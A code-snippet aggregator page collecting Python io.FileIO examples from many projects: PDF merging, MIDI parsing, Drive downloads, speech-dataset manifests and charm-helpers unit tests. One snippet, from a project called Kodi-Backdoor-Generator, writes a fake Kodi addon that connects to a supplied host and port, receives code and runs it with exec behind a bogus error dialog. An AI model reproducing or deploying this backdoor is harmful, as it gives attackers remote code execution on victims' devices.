python类FileIO()的实例源码

descriptors.py 文件源码 项目:sqlalchemy-media 作者: pylover 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def replace(self, attachable: [io.BytesIO, io.FileIO], position=None, **kwargs):
        """
        Swap the underlying file-object for a seekable one.

        .. versionadded:: 0.5

        :param attachable: A seekable file-object that becomes the new underlying file.
        :param position: Offset to seek to in the new file-object. When :data:`.None`, the
                         offset reported by :meth:`tell` before the swap is reused.
        :param kwargs: Forwarded unchanged to the parent initializer (the same as the
                       :class:`.BaseDescriptor`).
        """

        # The current offset has to be captured before the old object is closed.
        target_offset = self.tell() if position is None else position

        # Release the previous file-like object and install the replacement.
        self.close()
        self._file = attachable

        # Re-run the parent initializer with the caller's options, then restore the offset.
        super().__init__(**kwargs)
        self.seek(target_offset)
merger.py 文件源码 项目:spiderfoot 作者: wi-fi-analyzer 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def append(self, fileobj, bookmark=None, pages=None, import_bookmarks=True):
        """
        Concatenate a document onto the end of the pages collected so far.

        This is :meth:`merge()<merge>` with the insert position fixed to the
        current number of pages.

        :param fileobj: A File Object or an object that supports the standard read
            and seek methods similar to a File Object. Could also be a
            string representing a path to a PDF file.

        :param str bookmark: Optional text of a bookmark to apply at the beginning
            of the included file.

        :param pages: A :ref:`Page Range <page-range>` or a ``(start, stop[, step])``
            tuple selecting which pages of the source document are merged.

        :param bool import_bookmarks: Pass ``False`` to keep the source document's
            bookmarks from being imported.
        """

        # Inserting at index == page count is the same as appending.
        end_position = len(self.pages)
        self.merge(end_position, fileobj, bookmark, pages, import_bookmarks)
structure.py 文件源码 项目:midi 作者: MicroTransactionsMatterToo 项目源码 文件源码 阅读 41 收藏 0 点赞 0 评论 0
def __init__(self, data: Union[FileIO, BufferedReader]) -> None:
        """Parse a MIDI header chunk from *data* and store its fields on ``self``.

        Reads, in order: a 4-byte chunk type, a 4-byte big-endian length and
        three 2-byte big-endian integers, stored as ``format``, ``ntrks`` and
        ``tpqn``.

        :param data: Binary stream positioned at the start of the header chunk.
        :raises ValueError: If the chunk type is not ``MThd``, the header length
            is not 6, the format is not 0, 1 or 2, or a format 0 file declares
            more than one track.
        """
        chunk_type = data.read(4)
        if chunk_type != b'MThd':
            raise ValueError("File had invalid header chunk type")

        header_length = int.from_bytes(data.read(4), 'big')
        if header_length != 6:
            raise ValueError("File has unsupported header length")
        self.length = header_length

        # Local renamed so the builtin ``format`` is not shadowed.
        midi_format = int.from_bytes(data.read(2), 'big')
        if midi_format not in (0, 1, 2):
            raise ValueError("File has unsupported format")
        self.format = midi_format

        ntrks = int.from_bytes(data.read(2), 'big')
        # Format 0 holds exactly one track; only *more than one* is an error.
        # (The previous ``ntrks > 0`` check rejected every valid format 0 file.)
        if ntrks > 1 and midi_format == 0:
            raise ValueError("Multiple tracks in single track format")
        self.ntrks = ntrks

        self.tpqn = int.from_bytes(data.read(2), 'big')
kodi_backdoor.py 文件源码 项目:Kodi-Backdoor-Generator 作者: LukaSikic 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def addonPy(ip, port):
    """Write ``KodiBackdoor/addon.py`` with *ip* and *port* spliced into a script template.

    :param ip: Host string inserted inside the quotes of the ``s.connect`` call.
    :param port: Port inserted verbatim after the host; it is concatenated with
        ``+`` so it must already be a string.

    SECURITY NOTE(review): the generated script opens a socket to ``ip:port``,
    reads a length-prefixed payload and passes it to ``exec``, i.e. it runs
    arbitrary code supplied by the remote end, and then shows an error dialog.
    """
    # NOTE(review): io.FileIO is a raw binary stream; on Python 3 its write()
    # requires a bytes-like object, so writing this str literal would raise
    # TypeError. Presumably written for Python 2; confirm before reuse.
    with io.FileIO("KodiBackdoor/addon.py", "w") as file:
        file.write('''
import xbmcaddon
import xbmcgui
import socket,struct
addon       = xbmcaddon.Addon()
addonname   = addon.getAddonInfo('name')
line1 = "Error!"
line2 = "An error occurred"
line3 = "Connection to server failed... please try again later"
s=socket.socket(2,1)
s.connect(("'''+ip+'''",'''+port+'''))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
    d+=s.recv(4096)
exec(d,{'s':s})
xbmcgui.Dialog().ok(addonname, line1, line2, line3)
''')

#Zip folder
drive.py 文件源码 项目:GoogleBot 作者: MarcoBuster 项目源码 文件源码 阅读 43 收藏 0 点赞 0 评论 0
def download(user, file, msg):
    """Download a Drive file into ``/tmp`` and return the path it was saved to.

    The file is first requested with ``get_media``. If that attempt raises, the
    file is requested again through ``export_media`` as ``application/pdf`` and
    the saved file gets a ``.pdf`` suffix.

    :param user: Object passed to ``login`` and used to look up the progress
        message template via ``getstr``.
    :param file: Mapping providing the ``'name'`` and ``'id'`` of the file.
    :param msg: Message object whose ``edit`` method receives progress updates.
    :return: ``'/tmp/<name>'`` for a direct download, ``'/tmp/<name>.pdf'``
        when the export fallback was used.
    """
    def startdownload(_request):
        # Pull the request into ``fh`` chunk by chunk, reporting progress.
        downloader = MediaIoBaseDownload(fh, _request)
        done = False
        while not done:
            status, done = downloader.next_chunk()
            try:
                msg.edit(user.getstr('drive_downloading_progress')
                         .format(p=int(status.progress() * 100)))
            except botogram.api.APIError:
                # Progress updates are best-effort; the download itself goes on.
                pass

    os.chdir('/tmp')  # Sorry Windows users
    name = file.get('name')
    path = '/tmp/' + name

    service = login(user)
    # The context manager guarantees the handle is closed on every exit path
    # (it used to be left open), including before the rename below.
    with io.FileIO(name, 'wb') as fh:
        try:
            request = service.files().get_media(fileId=file.get('id'))
            startdownload(request)
            return path
        except Exception:
            # NOTE(review): presumably the direct download fails for files that
            # must be exported instead; confirm which errors are expected here.
            # Drop anything the failed attempt wrote so the export starts clean.
            fh.seek(0)
            fh.truncate()
            request = service.files().export_media(fileId=file.get('id'), mimeType='application/pdf')
            startdownload(request)

    os.rename(path, path + '.pdf')
    return path + '.pdf'
test_file.py 文件源码 项目:targets-python 作者: targets-fs 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def valid_io_modes(self, *a, **kw):
        """Return the subset of theoretical modes that ``io.FileIO`` accepts.

        Each candidate from ``theoretical_io_modes`` is tried against an
        existing temporary file. A mode counts as valid when the open succeeds
        or fails only because the file already exists (``EEXIST``); modes
        rejected with ``ValueError`` are dropped; any other ``IOError``
        propagates.
        """
        target = LocalTarget(is_tmp=True)
        # Make sure the file exists before probing the modes.
        target.open('w').close()

        accepted = set()
        for mode in self.theoretical_io_modes(*a, **kw):
            try:
                io.FileIO(target.path, mode).close()
            except ValueError:
                # Not a mode string FileIO understands.
                continue
            except IOError as err:
                if err.errno != EEXIST:
                    raise
            accepted.add(mode)
        return accepted
utils.py 文件源码 项目:deepspeech.pytorch 作者: SeanNaren 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def create_manifest(data_path, tag, ordered=True):
    """Write ``<tag>_manifest.csv`` listing every ``.wav`` file under *data_path*.

    Each row holds the absolute wav path and the absolute transcript path,
    where the transcript path is the wav path with ``/wav/`` replaced by
    ``/txt/`` and ``.wav`` replaced by ``.txt``.

    :param data_path: Directory tree that is walked for ``*.wav`` files.
    :param tag: Prefix of the manifest file name.
    :param ordered: When true, the collected paths are passed to ``_order_files``
        before the manifest is written.
    """
    manifest_path = '%s_manifest.csv' % tag

    wav_files = []
    for dirpath, _dirnames, files in os.walk(data_path):
        for name in fnmatch.filter(files, '*.wav'):
            wav_files.append(os.path.join(dirpath, name))

    file_paths = [path.strip() for path in tqdm(wav_files, total=len(wav_files))]
    print('\n')

    if ordered:
        _order_files(file_paths)

    with io.FileIO(manifest_path, "w") as manifest:
        for wav_path in tqdm(file_paths, total=len(file_paths)):
            txt_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
            row = ','.join((os.path.abspath(wav_path), os.path.abspath(txt_path))) + '\n'
            # FileIO is a raw byte stream, so the row is encoded explicitly.
            manifest.write(row.encode('utf-8'))
    print('\n')
teepty.py 文件源码 项目:gitsome 作者: donnemartin 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def _pipe_stdin(self, stdin):
        """Copy *stdin* into ``self._temp_stdin`` in ``self.bufsize`` sized pieces.

        Nothing is copied when *stdin* is ``None`` or an ``io.FileIO``.
        Buffered binary streams are read until exhausted; ``str`` input is
        encoded first and ``bytes`` input is sliced directly. The sink is
        flushed after every write.

        :raises ValueError: If *stdin* is of any other type.
        """
        if stdin is None or isinstance(stdin, io.FileIO):
            return None

        sink = self._temp_stdin
        chunk_size = self.bufsize

        if isinstance(stdin, io.BufferedIOBase):
            while True:
                chunk = stdin.read(chunk_size)
                if len(chunk) == 0:
                    break
                sink.write(chunk)
                sink.flush()
        elif isinstance(stdin, (str, bytes)):
            if isinstance(stdin, str):
                raw = stdin.encode()
            else:
                raw = stdin
            # One more slice than full chunks, so the (possibly empty) tail is written too.
            n_chunks = (len(raw) // chunk_size) + 1
            for start in range(0, n_chunks * chunk_size, chunk_size):
                sink.write(raw[start:start + chunk_size])
                sink.flush()
        else:
            raise ValueError('stdin not understood {0!r}'.format(stdin))
Node.py 文件源码 项目:AsyncDB 作者: JimChengLin 项目源码 文件源码 阅读 34 收藏 0 点赞 0 评论 0
def load(self, file: FileIO):
        """Populate this node from *file*, starting at the current offset.

        The start offset is stored in ``ptr``; ``is_leaf`` and ``keys`` come
        from the module-level ``load``. They are followed by 8-byte unsigned
        pointers: one per key for a leaf, otherwise one per key plus
        ``len(keys) + 1`` child pointers. ``size`` is the number of bytes
        consumed.
        """
        self.ptr = file.tell()
        self.is_leaf, self.keys = load(file)

        key_count = len(self.keys)
        if self.is_leaf:
            total = key_count
        else:
            # value pointers (key_count) followed by child pointers (key_count + 1)
            total = 2 * key_count + 1
        pointers = unpack('Q' * total, file.read(8 * total))

        if self.is_leaf:
            self.ptrs_value = list(pointers)
        else:
            self.ptrs_value = list(pointers[:key_count])
            self.ptrs_child = list(pointers[key_count:])

        self.size = file.tell() - self.ptr
test_sysctl.py 文件源码 项目:charm-helpers 作者: juju 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def test_create(self, mock_open):
        """Check that create() writes the setting, logs it and reloads sysctl."""
        sysctl_path = "/etc/sysctl.d/test-sysctl.conf"
        fake_file = MagicMock(spec=io.FileIO)
        mock_open.return_value = fake_file

        create('{"kernel.max_pid": 1337}', sysctl_path)

        # The setting is written in key=value form through the context-managed handle.
        written = fake_file.__enter__().write
        written.assert_called_with("kernel.max_pid=1337\n")

        self.log.assert_called_with(
            "Updating sysctl_file: /etc/sysctl.d/test-sysctl.conf"
            " values: {'kernel.max_pid': 1337}",
            level='DEBUG')

        self.check_call.assert_called_with(["sysctl", "-p", sysctl_path])
test_openstack_utils.py 文件源码 项目:charm-helpers 作者: juju 项目源码 文件源码 阅读 39 收藏 0 点赞 0 评论 0
def test_configure_install_source_distro_proposed(
            self, _spcc, _open, _lsb):
        """Check 'distro-proposed' and an explicit deb line as installation sources."""
        _lsb.return_value = FAKE_RELEASE
        fake_file = MagicMock(spec=io.FileIO)
        _open.return_value = fake_file

        # The keyword form writes a proposed-pocket entry to the opened file.
        openstack.configure_installation_source('distro-proposed')
        expected_entry = ('# Proposed\ndeb http://archive.ubuntu.com/ubuntu '
                          'precise-proposed main universe multiverse restricted\n')
        fake_file.__enter__().write.assert_called_once_with(expected_entry)

        # A literal deb line is handed to add-apt-repository unchanged.
        src = ('deb http://archive.ubuntu.com/ubuntu/ precise-proposed '
               'restricted main multiverse universe')
        openstack.configure_installation_source(src)
        _spcc.assert_called_once_with(['add-apt-repository', '--yes', src])
test_openstack_utils.py 文件源码 项目:charm-helpers 作者: juju 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def test_configure_install_source_uca_repos(
            self, _fip, _lsb, _install, _open):
        """Check every UCA source installs the keyring and writes its archive entry."""
        _lsb.return_value = FAKE_RELEASE
        fake_file = MagicMock(spec=io.FileIO)
        _open.return_value = fake_file
        _fip.side_effect = lambda x: x  # pass the argument straight through

        list_path = '/etc/apt/sources.list.d/cloud-archive.list'
        for src, url in UCA_SOURCES:
            openstack.configure_installation_source(src)
            expected_entry = "# Ubuntu Cloud Archive\n{}\n".format(url)
            _install.assert_called_with(['ubuntu-cloud-keyring'], fatal=True)
            _open.assert_called_with(list_path, 'w')
            fake_file.__enter__().write.assert_called_with(expected_entry)
test_openstack_utils.py 文件源码 项目:charm-helpers 作者: juju 项目源码 文件源码 阅读 36 收藏 0 点赞 0 评论 0
def test_save_scriptrc(self, _open, _charm_dir, _exists, _mkdir):
        """Check that save_script_rc() creates the scripts dir and writes the exports."""
        expected_lines = ['#!/bin/bash\n',
                          'export setting1=foo\n',
                          'export setting2=bar\n']
        fake_file = MagicMock(spec=io.FileIO)
        _open.return_value = fake_file
        _charm_dir.return_value = '/var/lib/juju/units/testing-foo-0/charm'
        _exists.return_value = False
        os.environ['JUJU_UNIT_NAME'] = 'testing-foo/0'

        openstack.save_script_rc(setting1='foo', setting2='bar')

        rcdir = '/var/lib/juju/units/testing-foo-0/charm/scripts'
        _mkdir.assert_called_with(rcdir)
        expected_f = '/var/lib/juju/units/testing-foo-0/charm/scripts/scriptrc'
        _open.assert_called_with(expected_f, 'wt')
        _mkdir.assert_called_with(os.path.dirname(expected_f))
        # Order of the export lines is not significant.
        fake_file.__enter__().write.assert_has_calls(
            [call(line) for line in expected_lines], any_order=True)
test_fetch_ubuntu.py 文件源码 项目:charm-helpers 作者: juju 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def test_configure_install_source_uca_repos(
            self, _fip, _lsb, _install, _open):
        """Check add_source() for every UCA source: keyring install and archive entry."""
        _lsb.return_value = FAKE_RELEASE
        fake_file = MagicMock(spec=io.FileIO)
        _open.return_value = fake_file
        _fip.side_effect = lambda x: x  # pass the argument straight through

        list_path = '/etc/apt/sources.list.d/cloud-archive.list'
        for src, url in UCA_SOURCES:
            fetch.add_source(src)
            expected_entry = "# Ubuntu Cloud Archive\n{}\n".format(url)
            _install.assert_called_with(['ubuntu-cloud-keyring'], fatal=True)
            _open.assert_called_with(list_path, 'w')
            fake_file.__enter__().write.assert_called_with(expected_entry)
utils.py 文件源码 项目:make_dataset 作者: hyzhan 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def create_manifest(data_path, tag, ordered=True):
    """Write ``<tag>_manifest.csv`` listing every ``.wav`` file under *data_path*.

    Each row holds the absolute wav path and the absolute transcript path,
    where the transcript path is the wav path with ``/wav/`` replaced by
    ``/txt/`` and ``.wav`` replaced by ``.txt``. Progress is reported through
    ``update_progress`` as a fraction of the number of wav files.

    :param data_path: Directory tree that is walked for ``*.wav`` files.
    :param tag: Prefix of the manifest file name.
    :param ordered: When true, the collected paths are passed to ``_order_files``
        before the manifest is written.
    """
    manifest_path = '%s_manifest.csv' % tag

    wav_files = []
    for dirpath, _dirnames, files in os.walk(data_path):
        for name in fnmatch.filter(files, '*.wav'):
            wav_files.append(os.path.join(dirpath, name))
    size = len(wav_files)

    file_paths = []
    for done, file_path in enumerate(wav_files, 1):
        file_paths.append(file_path.strip())
        update_progress(done / float(size))
    print('\n')

    if ordered:
        _order_files(file_paths)

    with io.FileIO(manifest_path, "w") as manifest:
        for done, wav_path in enumerate(file_paths, 1):
            txt_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
            row = ','.join((os.path.abspath(wav_path), os.path.abspath(txt_path))) + '\n'
            # FileIO is a raw byte stream, so the row is encoded explicitly.
            manifest.write(row.encode('utf-8'))
            update_progress(done / float(size))
    print('\n')
utils.py 文件源码 项目:make_dataset 作者: hyzhan 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def create_manifest(data_path, tag, ordered=True):
    """Write ``<tag>_manifest.csv`` listing every ``.wav`` file under *data_path*.

    Each row holds the absolute wav path and the absolute transcript path,
    where the transcript path is the wav path with ``/wav/`` replaced by
    ``/txt/`` and ``.wav`` replaced by ``.txt``. Progress is reported through
    ``update_progress`` as a fraction of the number of wav files.

    :param data_path: Directory tree that is walked for ``*.wav`` files.
    :param tag: Prefix of the manifest file name.
    :param ordered: When true, the collected paths are passed to ``_order_files``
        before the manifest is written.
    """
    manifest_path = '%s_manifest.csv' % tag

    wav_files = []
    for dirpath, _dirnames, files in os.walk(data_path):
        for name in fnmatch.filter(files, '*.wav'):
            wav_files.append(os.path.join(dirpath, name))
    size = len(wav_files)

    file_paths = []
    for done, file_path in enumerate(wav_files, 1):
        file_paths.append(file_path.strip())
        update_progress(done / float(size))
    print('\n')

    if ordered:
        _order_files(file_paths)

    with io.FileIO(manifest_path, "w") as manifest:
        for done, wav_path in enumerate(file_paths, 1):
            txt_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
            row = ','.join((os.path.abspath(wav_path), os.path.abspath(txt_path))) + '\n'
            # FileIO is a raw byte stream, so the row is encoded explicitly.
            manifest.write(row.encode('utf-8'))
            update_progress(done / float(size))
    print('\n')
utils.py 文件源码 项目:make_dataset 作者: hyzhan 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def create_manifest(data_path, tag, ordered=True):
    """Write ``<tag>_manifest.csv`` listing every ``.wav`` file under *data_path*.

    Each row holds the absolute wav path and the absolute transcript path,
    where the transcript path is the wav path with ``/wav/`` replaced by
    ``/txt/`` and ``.wav`` replaced by ``.txt``. Progress is reported through
    ``update_progress`` as a fraction of the number of wav files.

    :param data_path: Directory tree that is walked for ``*.wav`` files.
    :param tag: Prefix of the manifest file name.
    :param ordered: When true, the collected paths are passed to ``_order_files``
        before the manifest is written.
    """
    manifest_path = '%s_manifest.csv' % tag

    wav_files = []
    for dirpath, _dirnames, files in os.walk(data_path):
        for name in fnmatch.filter(files, '*.wav'):
            wav_files.append(os.path.join(dirpath, name))
    size = len(wav_files)

    file_paths = []
    for done, file_path in enumerate(wav_files, 1):
        file_paths.append(file_path.strip())
        update_progress(done / float(size))
    print('\n')

    if ordered:
        _order_files(file_paths)

    with io.FileIO(manifest_path, "w") as manifest:
        for done, wav_path in enumerate(file_paths, 1):
            txt_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
            row = ','.join((os.path.abspath(wav_path), os.path.abspath(txt_path))) + '\n'
            # FileIO is a raw byte stream, so the row is encoded explicitly.
            manifest.write(row.encode('utf-8'))
            update_progress(done / float(size))
    print('\n')
speedtest.py 文件源码 项目:SmartSocks 作者: waylybaye 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def __init__(self, **kwargs):
            """Wrap the process's stdout file descriptor in a strict UTF-8 text layer.

            Keyword arguments are accepted but not used.
            """
            # Raw, unbuffered writer on the same descriptor as sys.stdout.
            raw_stdout = FileIO(sys.stdout.fileno(), 'w')
            super(_Py3Utf8Stdout, self).__init__(raw_stdout, encoding='utf8', errors='strict')
openebs_utils.py 文件源码 项目:easy-jupyter 作者: openebs 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def download(url, file_name):
    """
    Download a file over HTTP and save it locally.

    The request is made before the destination is opened, so a request that
    raises no longer leaves behind an empty file or truncates an existing one.

    url : URL of file to be downloaded
    file_name : File name the response body is written to
    """
    # get request (done first: opening with "w" truncates the target immediately)
    response = get(url)
    # write the raw response body to file
    with io.FileIO(file_name, "w") as file:
        file.write(response.content)
py3k.py 文件源码 项目:radar 作者: amoose136 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def isfileobj(f):
        """Return True when *f* is a raw or buffered binary file object.

        Only ``io.FileIO``, ``io.BufferedReader`` and ``io.BufferedWriter``
        instances qualify; text wrappers and in-memory buffers do not.
        """
        binary_file_types = (io.FileIO, io.BufferedReader, io.BufferedWriter)
        return isinstance(f, binary_file_types)
_fileloader2.py 文件源码 项目:filefinder2 作者: asmodehn 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def get_data(self, path):
            """Read the file at *path* and return its whole content as bytes."""
            raw_file = io.FileIO(path, 'r')
            try:
                return raw_file.read()
            finally:
                # Always release the descriptor, even if the read fails.
                raw_file.close()

    # inspired from importlib2
merger.py 文件源码 项目:spiderfoot 作者: wi-fi-analyzer 项目源码 文件源码 阅读 32 收藏 0 点赞 0 评论 0
def write(self, fileobj):
        """
        Writes all data that has been merged to the given output file.

        When *fileobj* is a string it is treated as a path: the file is opened
        here in binary write mode and is closed again before returning, also
        when writing fails. A caller-supplied file object is left open.

        :param fileobj: Output file. Can be a filename or any kind of
            file-like object.
        """
        my_file = False
        if isString(fileobj):
            # ``open`` instead of ``file``: the latter only exists on Python 2.
            fileobj = open(fileobj, 'wb')
            my_file = True

        try:
            # Add pages to the PdfFileWriter and remember a reference to each
            # one so destinations and bookmarks can point at it.
            for page in self.pages:
                self.output.addPage(page.pagedata)
                page.out_pagedata = self.output.getReference(self.output._pages.getObject()["/Kids"][-1].getObject())

            # Once all pages are added, create bookmarks to point at those pages
            self._write_dests()
            self._write_bookmarks()

            # Write the output to the file
            self.output.write(fileobj)
        finally:
            # Only close what this method opened itself.
            if my_file:
                fileobj.close()
merger.py 文件源码 项目:spiderfoot 作者: wi-fi-analyzer 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def close(self):
        """
        Release every input file this object opened itself and reset its state.

        Inputs flagged as not owned are left open. Afterwards ``pages`` and
        ``inputs`` are empty lists and ``output`` is ``None``.
        """
        self.pages = []

        # Each entry is (file object, reader, owned-by-us flag).
        owned_files = (entry[0] for entry in self.inputs if entry[2])
        for file_obj in owned_files:
            file_obj.close()

        self.inputs = []
        self.output = None
merger.py 文件源码 项目:spiderfoot 作者: wi-fi-analyzer 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def addBookmark(self, title, pagenum, parent=None):
        """
        Add a bookmark to this PDF file.

        Without a parent the bookmark is appended to the top-level list. With a
        parent it is added to the nested list that directly follows the parent
        entry, creating that nested list when it does not exist yet.

        :param str title: Title to use for this bookmark.
        :param int pagenum: Page number this bookmark will point to.
        :param parent: A reference to a parent bookmark to create nested
            bookmarks. May also be a list of indices locating the parent.
        :return: The newly created bookmark object.
        """
        # Locate the parent first (identity check: ``None`` is a singleton and
        # ``==`` could be intercepted by a parent's own ``__eq__``).
        iloc = None
        if parent is not None:
            if isinstance(parent, list):
                iloc = parent
            else:
                iloc = self.findBookmark(parent)

        dest = Bookmark(TextStringObject(title), NumberObject(pagenum), NameObject('/FitH'), NumberObject(826))

        if parent is None:
            self.bookmarks.append(dest)
            return dest

        # Walk down to the list that contains the parent entry.
        bmparent = self.bookmarks
        for i in iloc[:-1]:
            bmparent = bmparent[i]

        # Children live in a list placed right after the parent entry.
        npos = iloc[-1] + 1
        if npos < len(bmparent) and isinstance(bmparent[npos], list):
            bmparent[npos].append(dest)
        else:
            bmparent.insert(npos, [dest])
        return dest
project.py 文件源码 项目:cheribuild 作者: CTSRD-CHERI 项目源码 文件源码 阅读 37 收藏 0 点赞 0 评论 0
def __runProcessWithFilteredOutput(self, proc: subprocess.Popen, logfile: "typing.Optional[io.FileIO]",
                                       stdoutFilter: "typing.Callable[[bytes], None]", cmdStr: str):
        """Pump a running process's stdout through a filter and optionally a logfile.

        Every stdout line is written to *logfile* (when given) and then passed
        to *stdoutFilter*, or echoed to ``sys.stdout`` when no filter is set.
        When a logfile is given, stderr is handled on a separate thread by
        ``self._handleStdErr``. After the process exits, any output still
        returned by ``communicate()`` is echoed and logged as well.

        :param proc: The started process; its ``stdout`` is iterated line by line.
        :param logfile: Binary file receiving a copy of the output, or ``None``.
        :param stdoutFilter: Callable invoked with each stdout line, or a falsy value.
        :param cmdStr: Command description used in the failure message.
        :raises SystemExit: If the process exits with a non-zero return code.
        """
        logfileLock = threading.Lock()  # we need a mutex so the logfile line buffer doesn't get messed up
        stderrThread = None
        if logfile:
            # use a thread to print stderr output and write it to logfile (not using a thread would block)
            stderrThread = threading.Thread(target=self._handleStdErr, args=(logfile, proc.stderr, logfileLock, self))
            stderrThread.start()
        for line in proc.stdout:
            with logfileLock:  # make sure we don't interleave stdout and stderr lines
                if logfile:
                    logfile.write(line)
                if stdoutFilter:
                    stdoutFilter(line)
                else:
                    sys.stdout.buffer.write(line)
                    flushStdio(sys.stdout)
        retcode = proc.wait()
        if stderrThread:
            stderrThread.join()
        # Not sure if the remaining call is needed
        # communicate() returns (stdout_data, stderr_data), in that order. The
        # names used to be swapped, which sent leftovers to the wrong stream
        # and could pass None to logfile.write().
        remainingOut, remainingErr = proc.communicate()
        if remainingErr:
            print("Process had remaining stderr:", remainingErr)
            sys.stderr.buffer.write(remainingErr)
            if logfile:
                logfile.write(remainingErr)
        if remainingOut:
            print("Process had remaining stdout:", remainingOut)
            sys.stdout.buffer.write(remainingOut)
            if logfile:
                logfile.write(remainingOut)
        if stdoutFilter and self._lastStdoutLineCanBeOverwritten:
            # add the final new line after the filtering
            sys.stdout.buffer.write(b"\n")
        if retcode:
            message = "Command \"%s\" failed with exit code %d.\n" % (cmdStr, retcode)
            if logfile:
                message += "See " + logfile.name + " for details."
            raise SystemExit(message)
test_utils.py 文件源码 项目:charm-nova-compute 作者: openstack 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def patch_open():
    '''Temporarily replace builtins.open with a stub that yields a mock file.

    Every call made to the stubbed open() is recorded on a mock, and entering
    the returned context manager gives back one shared mock file object.

    Yields the mock for "open" and "file", respectively.'''
    file_mock = MagicMock(spec=io.FileIO)
    open_mock = MagicMock(spec='builtins.open')

    @contextmanager
    def fake_open(*args, **kwargs):
        # Record the call so tests can assert on it, then hand out the file mock.
        open_mock(*args, **kwargs)
        yield file_mock

    with patch('builtins.open', fake_open):
        yield open_mock, file_mock
meta_events.py 文件源码 项目:midi 作者: MicroTransactionsMatterToo 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def sequence_number(data: Union[FileIO, BufferedReader]) -> Tuple[int, int, bytearray]:
    """Parse a Sequence Number meta event from *data*.

    The event length is read as a variable-length value, the same way the
    other meta-event parsers in this module read theirs, instead of as a
    fixed 4-byte integer. It must be 2 and is followed by a 2-byte
    big-endian sequence number.

    :param data: Binary stream positioned at the event's length field.
    :return: ``(length, sequence_number, raw_bytes)`` where ``raw_bytes`` are
        the two bytes the number was decoded from.
    :raises EventLengthError: If the length is not 2.
    """
    length = VariableLengthValue(data).value
    if length != 2:
        raise EventLengthError("Sequence Number length was incorrect. It should be 2, but it was {}".format(length))
    sequence_num_raw = bytearray(data.read(2))
    sequence_num = int.from_bytes(sequence_num_raw, "big")
    return length, sequence_num, sequence_num_raw
meta_events.py 文件源码 项目:midi 作者: MicroTransactionsMatterToo 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def text_event(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
    """Parse a text meta event: a variable-length size followed by ASCII text.

    :param data: Binary stream positioned at the event's length field.
    :return: ``(length, text, raw_bytes)``.
    :raises EventTextError: If the payload is not valid ASCII.
    """
    size = VariableLengthValue(data).value
    payload = bytearray(data.read(size))
    try:
        decoded = payload.decode("ASCII")
    except UnicodeDecodeError as exc:
        raise EventTextError("Unparsable text in text event") from exc
    else:
        return size, decoded, payload
meta_events.py 文件源码 项目:midi 作者: MicroTransactionsMatterToo 项目源码 文件源码 阅读 32 收藏 0 点赞 0 评论 0
def copyright_notice(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
    """Parse a copyright notice meta event: a variable-length size followed by ASCII text.

    :param data: Binary stream positioned at the event's length field.
    :return: ``(length, text, raw_bytes)``.
    :raises EventTextError: If the payload is not valid ASCII.
    """
    size = VariableLengthValue(data).value
    payload = bytearray(data.read(size))
    try:
        decoded = payload.decode("ASCII")
    except UnicodeDecodeError as exc:
        raise EventTextError("Unparsable text in copyright notice") from exc
    else:
        return size, decoded, payload
meta_events.py 文件源码 项目:midi 作者: MicroTransactionsMatterToo 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def chunk_name(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
    """Parse a track/sequence name meta event: a variable-length size followed by ASCII text.

    :param data: Binary stream positioned at the event's length field.
    :return: ``(length, text, raw_bytes)``.
    :raises EventTextError: If the payload is not valid ASCII.
    """
    size = VariableLengthValue(data).value
    payload = bytearray(data.read(size))
    try:
        decoded = payload.decode("ASCII")
    except UnicodeDecodeError as exc:
        raise EventTextError("Unparsable text in track/sequence name") from exc
    else:
        return size, decoded, payload


问题


面经


文章

微信
公众号

扫码关注公众号